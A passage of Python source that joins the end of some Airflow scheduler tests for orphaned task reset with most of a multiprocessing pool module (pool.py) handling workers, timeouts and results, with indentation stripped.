"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import (
TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state,
)
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
MAXMEM_USED_FMT = """\
child process exiting after exceeding memory limit ({0}KiB / {0}KiB)
"""
try:
import resource
except ImportError: # pragma: no cover
resource = None # noqa
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by # any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = TERM_SIGNAL
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value)
self._initial_value = value
def grow(self):
with self._cond:
self._initial_value += 1
self._value += 1
self._cond.notify()
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, str(self))
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True,
max_memory_per_child=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child or 0
prepare_result = self.prepare_result
getrusage = getattr(resource, 'getrusage', None)
rusage_self = getattr(resource, 'RUSAGE_SELF', None)
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
if max_memory_per_child > 0:
used_kb = getrusage(rusage_self).ru_maxrss
if used_kb <= 0:
error('worker unable to determine memory usage')
if used_kb > 0 and used_kb > max_memory_per_child:
error(MAXMEM_USED_FMT.format(
used_kb, max_memory_per_child))
return EX_RECYCLE
else:
error('worker unable to determine worker memory usage')
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), TERM_SIGNAL)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
# Keep maintaing workers until the cache gets drained, unless
# the pool is termianted
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool, cache):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
self.cache = cache
super(TaskHandler, self).__init__()
def body(self):
cache = self.cache
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
task = None
i = -1
try:
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
except Exception:
job, ind = task[:2]
try:
cache[job]._set(ind, (False, ExceptionInfo()))
except KeyError:
pass
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception:
job, ind = task[:2] if task else (0, 0)
if job in cache:
cache[job]._set(ind + 1, (False, ExceptionInfo()))
if set_length:
util.debug('doing set_length()')
set_length(i + 1)
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
enable_timeouts=False,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
self.enable_timeouts = bool(
enable_timeouts or
self.timeout is not None or
self.soft_timeout is not None
)
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
class Process(self._ctx.Process):
_controlled_termination = False
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
self._Process = Process
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool,
self._cache)
if threads:
self._task_handler.start()
self.check_timeouts = None
# Thread killing timedout jobs.
if self.enable_timeouts:
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
else:
self._timeout_handler = None
self._timeout_handler_started = False
self._timeout_handler_mutex = None
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
debug('Supervisor: worked %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
